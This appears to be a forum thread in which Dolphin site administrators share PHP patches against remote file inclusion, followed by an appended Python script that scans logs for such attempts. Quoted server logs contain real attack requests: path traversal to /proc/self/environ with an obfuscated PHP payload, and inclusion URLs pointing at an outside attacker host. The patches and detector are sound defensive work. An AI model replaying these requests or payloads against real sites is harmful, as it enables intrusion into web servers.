Add the following code to your ray/modules/global/inc/content.inc.php.
Add it at the top, above the first require_once command:
if (isset($_REQUEST['sIncPath']))
    die ('Hacking attempt');
So it looks like this:
// Abort if the client tries to supply $sIncPath through the request
if (isset($_REQUEST['sIncPath']))
    die ('Hacking attempt');
require_once($sIncPath . "xml.inc.php");
require_once($sIncPath . "constants.inc.php");
require_once($sIncPath . "apiFunctions.inc.php");
This stops any remote includes being used.
Next, edit /plugins/safehtml/HTMLSax3.php and add this at the top, above the require_once:
if (isset($_REQUEST['dir']))
    die ('Hacking attempt');
So it looks like this:
// Abort if the client tries to supply $dir through the request
if (isset($_REQUEST['dir']))
    die ('Hacking attempt');
require_once( "{$dir['plugins']}safehtml/HTMLSax3/States.php" );
require_once( "{$dir['plugins']}safehtml/HTMLSax3/Decorators.php" );
This stops remote access to your directories.
PS: we were involved in making a fast-fix patch that closes all such security holes for old PHP versions, to prevent variables being changed via GET params or if register globals is On.
We also closed other security holes (because this is not the only way to hack a site).
I spent several days and found many ways to hack any site. So register globals and all the fixes above are just the simplest and oldest way :)
I was never hacked, but I wanted to be 100% sure my server was secure, so I asked them to look at the attacks and fix it. That's what they came up with, but they also said there is still some questionable code in the content.inc.php file.
DoLaugh
Greets,
Jerry
All the best.
Stuart
Ps. what was that about questionable code...?
I am not a programmer so didn't ask, and they might have charged me more lol
I think Boonex are working on that file now to solve the issues.
thanks for the code mod snippets.
I work at hfw and am attempting to put this to use on one of the Dolphin installs that repeatedly gets suspended from RFI injections, etc...(seems like all I do is chase this exploit around.)
Boonex says it's our register_globals=on on our VPSs.
We'd like to think it's the 777 perm'd directories
but I have seen RFIs even with it off.
Believe me, I want to see this activity solved once and for all.
I remain hopeful.
You mentioned "here
Trying this mod now. My site has been hacked several times after the Dolphin security fix. I have followed all security instructions and keep getting hacked through Boonex scripts.
//plugins/safehtml/safehtml.php?dir[plugins]=/../../../../../../../../../../../../../../../../../../../../../../../../proc/self/environ HTTP/1.1" 200 617 "-" "<? $x0e=\"\\145x\\x65\\x63\"; $x0f=\"\\x66eo\\146\"; $x10=\"\\x66\\x72ea\\x64\"; $x11=\"\\146un\\x63\\164io\\x6e\\x5f\\x65x\\151s\\x74\\x73\"; $x12=\"i\\163\\x5f\\162\\x65s\\157ur\\x63\\x65\"; $x13=\"\\152\\157\\x69\\156\"; $x14=\"o\\142_g\\145t\\x5f\\x63o\\156\\164en\\x74\\x73\"; see more
83.64.48.195 - - [19/Sep/2008:20:38:46 -0400] "GET //plugins/safehtml/HTMLSax3.php?dir[plugins]=http://www.vogelgesang-av.de/cache/DONTDELETEFAGOT/i??? HTTP/1.1" 200 638 "-" "http://cr4nk.ws/ [de] (Windows 3.1; I) [crank]"
83.64.48.195 - - [19/Sep/2008:20:38:46 -0400] "GET /errors.php?error=http://www.vogelgesang-av.de/cache/DONTDELETEFAGOT/i??? HTTP/1.1" 404 1550 "-" "http://cr4nk.ws/ [de] (Windows 3.1; I) [crank]"
83.64.48.195
/ray/XML.php?action=getSettingValue&key=status&widget=youtube&file=main&_t=19
POSSIBLE
/plugins/tiny_mce/tiny_mce_gzip.php?js=true&diskcache=true&core=true&suffix=&themes=simple%2Cadvanced&plugins=style%2Clayer%2Ctable%2Csave%2Cadvhr%2Cadvimage%2Cadvlink%2Cemotions%2Ciespell%2Cinsertdatetime%2Cpreview%2Cmedia%2Csearchreplace%2Cprint%2Ccontextmenu%2Cpaste%2Cdirectionality%2Cfullscreen%2Cnoneditable%2Cvisualchars%2Cnonbreaking%2Cxhtmlxtras&languages=en
I have an extra row, as you can see: header.inc
require_once('header.inc.php');
require_once($sIncPath . "xml.inc.php");
require_once($sIncPath . "constants.inc.php");
require_once($sIncPath . "apiFunctions.inc.php");
You can still apply the patch if you wish, but you should be safe if you are on a server with register_globals off.
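An added example, not part of the thread or of Boonex's code: a log triage script that finds requests like the ones quoted above, where a query parameter tries to set the include variables `sIncPath` or `dir` to a remote URL or a traversal path. It assumes Apache Combined Log Format; the function names are hypothetical, and the sample lines, IPs and the host remote.example are constructed placeholders.

```python
import re
from urllib.parse import parse_qsl

# Variables the patch above refuses to accept from the request.
GUARDED = {"sIncPath", "dir"}
# Combined Log Format: client IP, request line, status code.
LOG_RE = re.compile(r'^(\S+) \S+ \S+ \[[^\]]+\] "(\S+) (\S+)[^"]*" (\d{3})')
REMOTE_RE = re.compile(r"^(?:https?|ftp|php|data)://", re.I)

# Constructed sample lines modelled on the requests quoted in the thread.
SAMPLE = [
    '192.0.2.10 - - [19/Sep/2008:20:38:46 -0400] "GET //plugins/safehtml/HTMLSax3.php?dir[plugins]=http://remote.example/i??? HTTP/1.1" 200 638 "-" "-"',
    '192.0.2.10 - - [19/Sep/2008:20:38:47 -0400] "GET /plugins/safehtml/safehtml.php?dir[plugins]=/../../../proc/self/environ HTTP/1.1" 200 617 "-" "-"',
    '192.0.2.11 - - [19/Sep/2008:20:38:48 -0400] "GET /ray/modules/global/inc/content.inc.php?sIncPath=http%3A%2F%2Fremote.example%2Fx HTTP/1.1" 200 20 "-" "-"',
    '192.0.2.12 - - [19/Sep/2008:20:39:00 -0400] "GET /ray/XML.php?action=getSettingValue&key=status&widget=youtube HTTP/1.1" 200 90 "-" "-"',
]


def classify(name, value):
    """Return a reason string if the parameter looks like an include attempt."""
    base = name.split("[", 1)[0]  # dir[plugins] -> dir
    if REMOTE_RE.match(value):
        kind = "remote-url"
    elif "../" in value or value.startswith("/proc/"):
        kind = "path-traversal"
    else:
        return None
    where = f"guarded variable {base}" if base in GUARDED else base
    return f"{kind} in {where}"


def scan(lines):
    """Yield (ip, path, status, reason) for each suspicious query parameter."""
    for line in lines:
        m = LOG_RE.match(line)
        if not m:
            continue
        ip, _method, target, status = m.groups()
        # Split by hand: a leading "//" would make urlsplit() read "plugins" as a host.
        path, _, query = target.partition("?")
        path = re.sub(r"/{2,}", "/", path)
        for name, value in parse_qsl(query, keep_blank_values=True):
            reason = classify(name, value)
            if reason:
                yield ip, path, int(status), reason


if __name__ == "__main__":
    for hit in scan(SAMPLE):
        print(*hit, sep="\t")
```

A 200 status on a hit does not by itself show the include succeeded, since the patched files also answer 200 when they stop with 'Hacking attempt'; compare the response size against a normal request.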